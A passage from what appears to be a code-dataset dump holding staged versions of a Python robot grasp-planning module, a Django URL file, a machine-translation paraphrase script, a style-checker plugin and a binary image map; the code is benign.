plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n base = wd.World(cam_pos=[0.5, 0.5, 0.3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm,\n min_dist_between_sampled_contact_points=0.02)\n for grasp_info in grasp_info_list:\n (jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos,\n hnd_rotmat) = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-4": "import math\nimport numpy as np\nimport basis.robot_math as rm\nimport grasping.annotation.utils as gu\nfrom scipy.spatial import cKDTree\n\n\ndef plan_contact_pairs(objcm, max_samples=100,\n min_dist_between_sampled_contact_points=0.005,\n angle_between_contact_normals=math.radians(160), toggle_sampled_points=\n False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]:\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * \n 0.001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(\n angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1,\n min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1\n ) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [\n contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s, objcm, angle_between_contact_normals=math.radians(\n 160), openning_direction='loc_x', rotation_interval=math.radians(22.5),\n max_samples=100, min_dist_between_sampled_contact_points=0.005,\n contact_offset=0.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm, max_samples=max_samples,\n min_dist_between_sampled_contact_points=\n min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f'{i} of {len(contact_pairs)} done!')\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1\n ) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError('Openning direction must be loc_x or loc_y!')\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s, objcm,\n gl_jaw_center_pos=contact_center, gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y, jaw_width=jaw_width,\n gl_rotation_ax=contact_n0, rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name=\n 'preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=\n file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name=\n 'preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n base = wd.World(cam_pos=[0.5, 0.5, 0.3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm,\n min_dist_between_sampled_contact_points=0.02)\n for grasp_info in grasp_info_list:\n (jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos,\n hnd_rotmat) = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-5": "import math\nimport numpy as np\nimport basis.robot_math as rm\nimport grasping.annotation.utils as gu\nfrom scipy.spatial import cKDTree\n\n\ndef plan_contact_pairs(objcm,\n max_samples=100,\n min_dist_between_sampled_contact_points=.005,\n angle_between_contact_normals=math.radians(160),\n toggle_sampled_points=False):\n \"\"\"\n find the contact pairs using rayshooting\n the finally returned number of contact pairs may be smaller than the given max_samples due to the min_dist constraint\n :param angle_between_contact_normals:\n :param toggle_sampled_points\n :return: [[contact_p0, contact_p1], ...]\n author: weiwei\n date: 20190805, 20210504\n \"\"\"\n contact_points, face_ids = objcm.sample_surface(nsample=max_samples,\n radius=min_dist_between_sampled_contact_points / 2)\n contact_normals = objcm.objtrm.face_normals[face_ids]\n contact_pairs = []\n tree = cKDTree(contact_points)\n near_history = np.array([0] * len(contact_points), dtype=bool)\n for i, contact_p0 in enumerate(contact_points):\n if near_history[i]: # if the point was previous near to some points, ignore\n continue\n contact_n0 = contact_normals[i]\n hit_points, hit_normals = objcm.ray_hit(contact_p0 - contact_n0 * .001, contact_p0 - contact_n0 * 100)\n if len(hit_points) > 0:\n for contact_p1, contact_n1 in zip(hit_points, hit_normals):\n if np.dot(contact_n0, contact_n1) < -math.cos(angle_between_contact_normals):\n near_points_indices = tree.query_ball_point(contact_p1, min_dist_between_sampled_contact_points)\n if len(near_points_indices):\n for npi in near_points_indices:\n if np.dot(contact_normals[npi], contact_n1) > math.cos(angle_between_contact_normals):\n near_history[npi] = True\n contact_pairs.append([[contact_p0, contact_n0], [contact_p1, contact_n1]])\n if toggle_sampled_points:\n return contact_pairs, contact_points\n return contact_pairs\n\n\ndef plan_grasps(hnd_s,\n objcm,\n angle_between_contact_normals=math.radians(160),\n openning_direction = 'loc_x',\n rotation_interval=math.radians(22.5),\n max_samples=100,\n min_dist_between_sampled_contact_points=.005,\n contact_offset=.002):\n \"\"\"\n\n :param objcm:\n :param hnd_s:\n :param angle_between_contact_normals:\n :param openning_direction: 'loc_x' or 'loc_y' depending on gripper types\n :param rotation_granularity:\n :param max_samples:\n :param min_dist_between_sampled_contact_points:\n :param contact_offset: offset at the cotnact to avoid being closely in touch with object surfaces\n :return: a list [[jawwidth, gl_jaw_center_pos, pos, rotmat], ...]\n \"\"\"\n contact_pairs = plan_contact_pairs(objcm,\n max_samples=max_samples,\n min_dist_between_sampled_contact_points=min_dist_between_sampled_contact_points,\n angle_between_contact_normals=angle_between_contact_normals)\n grasp_info_list = []\n import modeling.geometric_model as gm\n for i, cp in enumerate(contact_pairs):\n print(f\"{i} of {len(contact_pairs)} done!\")\n contact_p0, contact_n0 = cp[0]\n contact_p1, contact_n1 = cp[1]\n contact_center = (contact_p0 + contact_p1) / 2\n jaw_width = np.linalg.norm(contact_p0 - contact_p1) + contact_offset * 2\n if jaw_width > hnd_s.jawwidth_rng[1]:\n continue\n if openning_direction == 'loc_x':\n jaw_center_x = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n jaw_center_y = np.cross(jaw_center_z, jaw_center_x)\n elif openning_direction == 'loc_y':\n jaw_center_y = contact_n0\n jaw_center_z = rm.orthogonal_vector(contact_n0)\n else:\n raise ValueError(\"Openning direction must be loc_x or loc_y!\")\n grasp_info_list += gu.define_grasp_with_rotation(hnd_s,\n objcm,\n gl_jaw_center_pos=contact_center,\n gl_jaw_center_z=jaw_center_z,\n gl_jaw_center_y=jaw_center_y,\n jaw_width=jaw_width,\n gl_rotation_ax=contact_n0,\n rotation_interval=rotation_interval,\n toggle_flip=True)\n return grasp_info_list\n\n\ndef write_pickle_file(objcm_name, grasp_info_list, root=None, file_name='preannotated_grasps.pickle', append=False):\n if root is None:\n root = './'\n gu.write_pickle_file(objcm_name, grasp_info_list, root=root, file_name=file_name, append=append)\n\n\ndef load_pickle_file(objcm_name, root=None, file_name='preannotated_grasps.pickle'):\n if root is None:\n root = './'\n return gu.load_pickle_file(objcm_name, root=root, file_name=file_name)\n\n\nif __name__ == '__main__':\n import os\n import basis\n import robot_sim.end_effectors.grippers.xarm_gripper.xarm_gripper as xag\n import modeling.collision_model as cm\n import visualization.panda.world as wd\n\n base = wd.World(cam_pos=[.5, .5, .3], lookat_pos=[0, 0, 0])\n gripper_s = xag.XArmGripper(enable_cc=True)\n objpath = os.path.join(basis.__path__[0], 'objects', 'block.stl')\n objcm = cm.CollisionModel(objpath)\n objcm.attach_to(base)\n objcm.show_localframe()\n grasp_info_list = plan_grasps(gripper_s, objcm, min_dist_between_sampled_contact_points=.02)\n for grasp_info in grasp_info_list:\n jaw_width, gl_jaw_center_pos, gl_jaw_center_rotmat, hnd_pos, hnd_rotmat = grasp_info\n gic = gripper_s.copy()\n gic.fix_to(hnd_pos, hnd_rotmat)\n gic.jaw_to(jaw_width)\n print(hnd_pos, hnd_rotmat)\n gic.gen_meshmodel().attach_to(base)\n base.run()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
ANCHO = 600
ALTO = 800
|
normal
|
{
"blob_id": "71ca67948100fb7ad388934740cead1ebe4a2b52",
"index": 8549,
"step-1": "<mask token>\n",
"step-2": "ANCHO = 600\nALTO = 800\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
#coding: utf-8
from django.conf.urls import patterns, url
import views
urlpatterns = patterns('',
url(r'^douban/books$', views.BookList.as_view()),
)
|
normal
|
{
"blob_id": "93418e554893db4eb888396e8d6f60a8364d9ee3",
"index": 8560,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = patterns('', url('^douban/books$', views.BookList.as_view()))\n",
"step-3": "from django.conf.urls import patterns, url\nimport views\nurlpatterns = patterns('', url('^douban/books$', views.BookList.as_view()))\n",
"step-4": "#coding: utf-8\n\nfrom django.conf.urls import patterns, url\n\nimport views\n\nurlpatterns = patterns('',\n url(r'^douban/books$', views.BookList.as_view()),\n)\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
# coding: utf-8
import sys
sys.path.insert(0, "/code/huggingface/transformers-fair-wmt/src")
import logging
logging.disable(logging.INFO) # disable INFO and DEBUG logger everywhere
from transformers.tokenization_fsmt import FSMTTokenizer
from transformers.modeling_fsmt import FSMTForConditionalGeneration
def translate(src, tgt, text):
# to switch to local model
#mname = "/code/huggingface/transformers-fair-wmt/data/wmt19-{src}-{tgt}"
# s3 uploaded model
mname = f"stas/wmt19-{src}-{tgt}"
tokenizer = FSMTTokenizer.from_pretrained(mname)
model = FSMTForConditionalGeneration.from_pretrained(mname)
encoded = tokenizer.encode(text, return_tensors='pt')
# print(encoded)
output = model.generate(encoded, num_beams=5, early_stopping=True)[0]
# print(output)
decoded = tokenizer.decode(output, skip_special_tokens=True)
#print(decoded)
return decoded
def paraphrase(src, tgt, text):
return translate(tgt, src, translate(src, tgt, text))
#text = """Here's a little song I wrote. You might want to sing it note for note. Don't worry, be happy. In every life we have some trouble. But when you worry you make it double. Don't worry, be happy. Don't worry, be happy now."""
text = "Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?"
en_ru = paraphrase('en', 'ru', text)
en_de = paraphrase('en', 'de', text)
# print together to avoid the logger noise :(
print("Paraphrasing:")
print(f"en : {text}")
print(f"en-ru-en: {en_ru}")
print(f"en-de-en: {en_de}")
# Paraphrasing:
# en : Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?
# en-ru-en: Every morning when I wake up, I have a delightful joy - the joy of being Salvador Dali - and I ask myself in delight: What wonderful things is this Salvador Dali going to do today?
# en-de-en: Every morning when I wake up, I experience an extraordinary joy - the joy of being Salvador Dalí - and I wonder with delight: what wonderful things will this Salvador Dalí do today?
|
normal
|
{
"blob_id": "7864138459caf469a0148420718b2282598141de",
"index": 6674,
"step-1": "<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\n<mask token>\nlogging.disable(logging.INFO)\n<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\n<mask token>\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
"step-3": "<mask token>\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\n<mask token>\nlogging.disable(logging.INFO)\n<mask token>\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\ntext = (\n 'Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?'\n )\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
"step-4": "import sys\nsys.path.insert(0, '/code/huggingface/transformers-fair-wmt/src')\nimport logging\nlogging.disable(logging.INFO)\nfrom transformers.tokenization_fsmt import FSMTTokenizer\nfrom transformers.modeling_fsmt import FSMTForConditionalGeneration\n\n\ndef translate(src, tgt, text):\n mname = f'stas/wmt19-{src}-{tgt}'\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n encoded = tokenizer.encode(text, return_tensors='pt')\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n return decoded\n\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n\ntext = (\n 'Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?'\n )\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\nprint('Paraphrasing:')\nprint(f'en : {text}')\nprint(f'en-ru-en: {en_ru}')\nprint(f'en-de-en: {en_de}')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nsys.path.insert(0, \"/code/huggingface/transformers-fair-wmt/src\")\n\nimport logging\nlogging.disable(logging.INFO) # disable INFO and DEBUG logger everywhere\n\nfrom transformers.tokenization_fsmt import FSMTTokenizer\nfrom transformers.modeling_fsmt import FSMTForConditionalGeneration\n\ndef translate(src, tgt, text):\n # to switch to local model\n #mname = \"/code/huggingface/transformers-fair-wmt/data/wmt19-{src}-{tgt}\"\n # s3 uploaded model\n mname = f\"stas/wmt19-{src}-{tgt}\"\n tokenizer = FSMTTokenizer.from_pretrained(mname)\n model = FSMTForConditionalGeneration.from_pretrained(mname)\n\n encoded = tokenizer.encode(text, return_tensors='pt')\n # print(encoded)\n\n output = model.generate(encoded, num_beams=5, early_stopping=True)[0]\n # print(output)\n\n decoded = tokenizer.decode(output, skip_special_tokens=True)\n #print(decoded)\n return decoded\n\ndef paraphrase(src, tgt, text):\n return translate(tgt, src, translate(src, tgt, text))\n\n#text = \"\"\"Here's a little song I wrote. You might want to sing it note for note. Don't worry, be happy. In every life we have some trouble. But when you worry you make it double. Don't worry, be happy. Don't worry, be happy now.\"\"\"\n\ntext = \"Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?\"\n\nen_ru = paraphrase('en', 'ru', text)\nen_de = paraphrase('en', 'de', text)\n# print together to avoid the logger noise :(\nprint(\"Paraphrasing:\")\nprint(f\"en : {text}\")\nprint(f\"en-ru-en: {en_ru}\")\nprint(f\"en-de-en: {en_de}\")\n\n# Paraphrasing:\n# en : Every morning when I wake up, I experience an exquisite joy - the joy of being Salvador Dalí - and I ask myself in rapture: What wonderful things is this Salvador Dalí going to accomplish today?\n# en-ru-en: Every morning when I wake up, I have a delightful joy - the joy of being Salvador Dali - and I ask myself in delight: What wonderful things is this Salvador Dali going to do today?\n# en-de-en: Every morning when I wake up, I experience an extraordinary joy - the joy of being Salvador Dalí - and I wonder with delight: what wonderful things will this Salvador Dalí do today?\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import re
IS_WITH_SINGLETON_REGEX = re.compile("(!=|==)\s*(True|False|None)")
def check_is_with_singleton(physical_line, line_number):
match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)
if match_obj is not None:
offset = match_obj.span()[0]
return (0, 12, (line_number, offset), "Use equal with singleton")
plugins = {
"physical_line": [check_is_with_singleton],
"logical_line": [],
"ast": []
}
|
normal
|
{
"blob_id": "cf6d3a0fbf2a2daf8432622f780e138784ec505d",
"index": 8300,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\n<mask token>\n",
"step-3": "<mask token>\nIS_WITH_SINGLETON_REGEX = re.compile('(!=|==)\\\\s*(True|False|None)')\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\nplugins = {'physical_line': [check_is_with_singleton], 'logical_line': [],\n 'ast': []}\n",
"step-4": "import re\nIS_WITH_SINGLETON_REGEX = re.compile('(!=|==)\\\\s*(True|False|None)')\n\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n if match_obj is not None:\n offset = match_obj.span()[0]\n return 0, 12, (line_number, offset), 'Use equal with singleton'\n\n\nplugins = {'physical_line': [check_is_with_singleton], 'logical_line': [],\n 'ast': []}\n",
"step-5": "import re\n\nIS_WITH_SINGLETON_REGEX = re.compile(\"(!=|==)\\s*(True|False|None)\")\n\ndef check_is_with_singleton(physical_line, line_number):\n match_obj = IS_WITH_SINGLETON_REGEX.search(physical_line)\n\n if match_obj is not None:\n offset = match_obj.span()[0]\n return (0, 12, (line_number, offset), \"Use equal with singleton\")\n\nplugins = {\n \"physical_line\": [check_is_with_singleton],\n \"logical_line\": [],\n \"ast\": []\n}",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
ba0563.pngMap = [
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000011111111000000000000000000000000000000000000000',
'00000000000000000000000000000000000000000000000000000000000000000000000000000111111111111000000000000000000000000000000000000000',
